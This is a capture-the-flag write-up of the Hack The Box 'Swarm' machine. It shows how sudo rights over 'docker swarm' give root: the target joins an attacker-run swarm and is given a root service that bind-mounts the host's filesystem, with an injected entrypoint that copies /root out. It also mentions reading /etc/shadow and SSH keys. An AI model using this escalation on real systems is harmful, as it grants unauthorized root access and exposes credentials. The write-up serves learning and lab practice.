Intro
Business CTF featured a fullpwn category, which consisted of 5 boxes of varying difficulty where you need to get initial access and escalate privileges to root. However, one of the easy ones, Swarm, had a premise for privilege escalation that you rarely get to see with CTF machines. GTFOBins is well known for documenting ways to escalate privileges with sudo or SUID permissions, but what if you had sudo on something that wasn't documented? What would you do?
Though it's much harder to communicate trial and error in text, the purpose of this blog is to highlight the research (and struggle) involved in figuring out how to escalate privileges using only `docker swarm`, which, at the time of writing, wasn't explained anywhere (but is 100% possible if you just read how Docker Swarm works).
Context
The nmap scan looks like this:
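Something along these lines, with `<box-ip>` standing in for the target's address:

```bash
# full TCP sweep plus default scripts and version detection (output omitted)
nmap -sC -sV -p- <box-ip>
```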
The box has a Docker registry hosted on port 5000/tcp (think of a locally hosted Git server, but for Docker images) with one image on it. Since the registry is unauthenticated, we can pull down the image and inspect it to find a database containing hashes that we can crack. One set of credentials gives us local access as `plessing`.
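As a rough sketch of that registry poking (the `<box-ip>` address and `latest` tag are placeholders; the `newsbox-web` image name comes up again later):

```bash
# enumerate the unauthenticated registry via the Registry v2 API
curl http://<box-ip>:5000/v2/_catalog
curl http://<box-ip>:5000/v2/newsbox-web/tags/list

# Docker wants HTTPS by default, so an HTTP registry needs to be whitelisted in
# /etc/docker/daemon.json first: { "insecure-registries": ["<box-ip>:5000"] }
docker pull <box-ip>:5000/newsbox-web:latest

# dump the image to a tarball and dig through its layers offline
docker save <box-ip>:5000/newsbox-web:latest -o newsbox-web.tar
```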
Difficulty is relative, but the foothold wasn't too difficult. In fact, finding the privilege escalation vector isn't too hard either.
We can run `docker swarm` with root permissions! This must be easy to do! Just copy and paste something from GTFOBins, call it a day, right?
Oh. Well surely someone has just written about this, right?
Well then.
All of these links are the standard Docker breakouts/privescs, but none of them cover Docker Swarm. Looks like we have to figure this out ourselves.
What even is Docker Swarm anyway?
I wrote a pretty long post giving an intro to Docker back in 2022, but I never touched on Docker Swarm, mainly because I never had a use for it. However, since we need to figure out how to abuse this, there’s no better place to learn than the original docs (most of the time, at least). Per Docker documentation:
A swarm consists of multiple Docker hosts which run in Swarm mode and act as managers, to manage membership and delegation, and workers, which run swarm services. A given Docker host can be a manager, a worker, or perform both roles.
If Docker Compose is a way to orchestrate multiple containers on the same engine, then Swarm is a similar thing, except we're now orchestrating Docker Engines on different hosts. The purpose makes sense: if you have containers deployed on a single host, there's a certain point where that workload needs to be distributed in some way. From an attacker's perspective, then, having sudo privileges to this is extremely lucrative. Just because a privilege escalation isn't documented doesn't mean it's not possible; we just have to dig for it, especially knowing the number of ways a normal Docker engine can let you escalate privileges.
Understanding Command Line Features
We can use the command line to get a sense of how Docker Swarm works. On the compromised box:
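The subcommands look roughly like this (paraphrased from the CLI help rather than copied verbatim):

```bash
sudo docker swarm --help
# Commands:
#   ca          Display and rotate the root CA
#   init        Initialize a swarm
#   join        Join a swarm as a node and/or manager
#   join-token  Manage join tokens
#   leave       Leave the swarm
#   unlock      Unlock swarm
#   unlock-key  Manage the unlock key
#   update      Update the swarm
```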
Without being connected to a swarm, we can either start a new swarm, or join one (either as a manager or a node). Let’s see what options we have if we started a swarm:
There are a lot of options here, which might be hard to process, but we can narrow down what may or may not be worth looking at based on our goal of escalating access.
- Arbitrary File Read - With arbitrary file read, we would be able to read `/root/root.txt`, but more practically, we could read `/etc/shadow` or any SSH keys that the root user might have.
- Arbitrary File Write - With arbitrary file write, we could insert a new root user into `/etc/passwd` or `/etc/shadow`, or overwrite some other file that's being executed as root.
- Command Execution - Self-explanatory: if the goal is to run commands as root, command execution would give us execution as root.
There are likely other ways you can come up with, but these three umbrella goals help us realize that, at the very least, the logic of any of these flags will not help us. All of them alter something about the swarm configuration that doesn't advance us closer to our goal. We can check to see if `--external-ca` reads from a file, as programs will often error out by printing the contents of the file, but it unfortunately does not.
The `docker swarm init` command also doesn't give us too much to look at.
The Swarm Rises
Docker Swarm works by having nodes join a manager, and the manager decides what the nodes do, so let's try setting that up. Knowing that the manager controls nodes, and that the nodes are ultimately running Docker containers, I want to try having my box be the manager and the victim box be the node. On my machine, I'll initialize the swarm, specifying the address to listen on because I'm on the VPN.
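Something like the following, with 10.10.14.17 being my address on the HTB VPN:

```bash
# on the attacking machine: become a swarm manager and advertise the VPN address
docker swarm init --advertise-addr 10.10.14.17
# the output includes a ready-made `docker swarm join --token ...` command for workers
```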
Copying and pasting the join command into the victim machine connects it back to my swarm, which it's only able to do since we have sudo access.
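The pasted command looks roughly like this (the join token here is a placeholder):

```bash
# on the victim, as plessing, using our sudo rights over docker swarm
sudo docker swarm join --token SWMTKN-1-<worker-token> 10.10.14.17:2377
```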
Attempting to Execute Code - Fail
Now the question is how to do anything to our new node. The documentation’s quickstart guide gives the following example for deploying a new service:
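It's along these lines:

```bash
# the quickstart's hello-world service: one replica of alpine pinging docker.com
docker service create --replicas 1 --name helloworld alpine ping docker.com
```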
Cool! So all we have to do is copy and paste this into our box, changing `docker.com` to `10.10.14.17` because HTB machines don't have internet access. Running `docker service ls` confirms that this is up.
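In other words, something like:

```bash
# same service, but pinging my VPN address instead of docker.com
docker service create --replicas 1 --name helloworld alpine ping 10.10.14.17

# check that the service shows up on the swarm
docker service ls
```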
The docs tell us we can also inspect services by ID, and see which nodes are running the service.
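Roughly:

```bash
# human-readable summary of the service definition
docker service inspect --pretty helloworld

# list the service's tasks, including which node each one was scheduled on
docker service ps helloworld
```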
Everything looks good until we run the `service ps` command. Although our host is the manager and we want the node to be the one running the container, the node actually has no way to pull that image because, as we mentioned earlier, it isn't internet connected. As a result, my best guess is that Docker defaults to whatever host is most convenient to deploy the service on.
It's at this point that I tried to experiment with setting both machines to "manager" to see if some execution was possible, and from my light testing, I couldn't make anything happen. I would include this tangent here, but to be quite honest, it wouldn't add much since I just lost sight of what the goal was. Setting both machines to manager might add some more things to configure for swarm, but I should have realized that swarm is another way to control Docker. That's it. Normally, access to `docker` lets you escalate privileges, so let's focus up and just go after this.
Putting the Pieces Together
So we’ve identified a few problems we need to solve:
- We need the node to be able to access a Docker image to run (and force it onto the `swarm` hostname and not ours)
- We need to figure out a way to execute code in the container
- (maybe 2a) We need to set up the container so we can escalate privileges
Answering question 1 isn't too bad; some Googling returns this blog, which has the following example:
We can reuse the registry that's already on the box to import the `newsbox-web` image.
Note: I later learned that the unauthenticated access to the registry included push access, so we literally could have just used our own custom image. We could have thrown OWASP Juice Shop on there if we really wanted to.
Additionally, this Stack Overflow post mentions the `--constraint` flag, which allows us to restrict service creation to servers with specific attributes.
So, the service we want to create looks like this so far:
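Something along these lines, where `<box-ip>:5000` is the box's registry, `swarm` is the target's hostname, and the service name is arbitrary:

```bash
# pull newsbox-web from the box's own registry and pin the task to the target node
docker service create --name pwn \
  --constraint 'node.hostname==swarm' \
  <box-ip>:5000/newsbox-web
```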
We can run this to confirm that it runs on the target box.
Okay, now things are starting to make sense. We now have to deal with the question of code execution and privilege escalation. If we return to the documentation once more, this time looking at the information from the `--help` flag, a few flags stand out:
- `--entrypoint` - This will override the entrypoint of the Docker container (i.e. the very first process that runs in the container), which will let us insert commands
- `-u` - This sets the user running in the container, which we can set to root, because obviously
- `-t` - This will allocate a pseudo-TTY, which will be useful if we want to get shell access to the container
- `--mount` - This will be the key to our privilege escalation. If we can mount the root of the filesystem (`/`) into the container, and we're already root inside the container, we have full control over the host's file system, which we can use to read any SSH keys the root user has, or just the root flag.
Before coming to the mount idea, I was trying to figure out how to execute commands within a Docker container/service from a manager node, but it just doesn't seem to be a feature Swarm offers (which, again, takes trial and error to find out). Coming back to the main point, we can view the documentation for using mounts with services here.
Bind mounts are file system paths from the host where the scheduler deploys the container for the task. Docker mounts the path into the container. The file system path must exist before the swarm initializes the container for the task.
The following example is given for a read-write bind:
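Paraphrased, it's along these lines:

```bash
# generic read-write bind mount for a swarm service (placeholders as in the docs)
docker service create \
  --mount type=bind,src=<HOST-PATH>,dst=<CONTAINER-PATH> \
  --name myservice \
  <IMAGE>
```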
There are some warnings about using bind mounts, but since we're only working with the one system, we shouldn't have any problems. With all the details in place, our command becomes this:
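Roughly (the image reference, service name, and exact entrypoint quoting here are illustrative rather than verbatim):

```bash
# root user + bind mount of / + injected entrypoint, pinned to the target node
docker service create --name pwn -t -u root \
  --constraint 'node.hostname==swarm' \
  --mount type=bind,src=/,dst=/host \
  --entrypoint 'sh -c "cp -r /host/root /host/freedom && chmod -R 777 /host/freedom; python manage.py runserver 0.0.0.0:8000"' \
  <box-ip>:5000/newsbox-web
```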
Breaking down all of the new additions:
- The `--mount type=bind...` option mounts `/` from the host into a new directory called `/host` in the container. Any changes to the files in that mount will be reflected on the host and vice versa.
- `-u root` ensures we're running with enough privileges in the container to read/modify the files we want.
- `--entrypoint` gets a little funky. From my testing, we can't just call some bash commands and call it a day, because then the container will just exit (at least, that's what happened to me). After inspecting `newsbox-web`'s Dockerfile, the entrypoint to that container is `python manage.py runserver 0.0.0.0:8000`. To keep that intact, we essentially inject commands before that Python command is called to copy the mounted `/root` directory to a new, world-modifiable directory called `/freedom`.
Running it from my attacking host, the service deploys successfully after Docker waits 5 seconds to confirm stability.
And if I check the worker node, we see a new “freedom” directory:
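Something like:

```bash
# back on the victim as plessing: /root was copied to a world-readable /freedom
ls -la /freedom
cat /freedom/root.txt
```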
And there we have the flag:
flag: HTB{5tunG_bY_th3_5w4rm}
Overall, this box's "Easy" rating was, in my opinion, perfect. The box's premise was simple and the research was not obscure, but you could not proceed without taking the time to pause and think about what's actually happening. This writeup was very geared towards beginners, and I hope it sheds some more light on the process of coming up with these attacks, because people are rarely popping shells on the first try.
“Alternative” Solutions
Docker is an ecosystem for a lot of shenanigans, so naturally there are multiple ways to achieve similar goals.
Box Author’s Solution
C4rm3l0, the box author, put out their solution here, which was ultimately very similar to mine, except they created and pushed a new image to the registry. They also started the swarm on the `swarm` box instead of their attacking machine, which worked out similarly.
Using A VPS
lordrukie on Discord mentioned having issues with using swarm on their Mac machine.
Their solution was to spin up a VPS and create a Docker Compose file to deploy the stack automatically.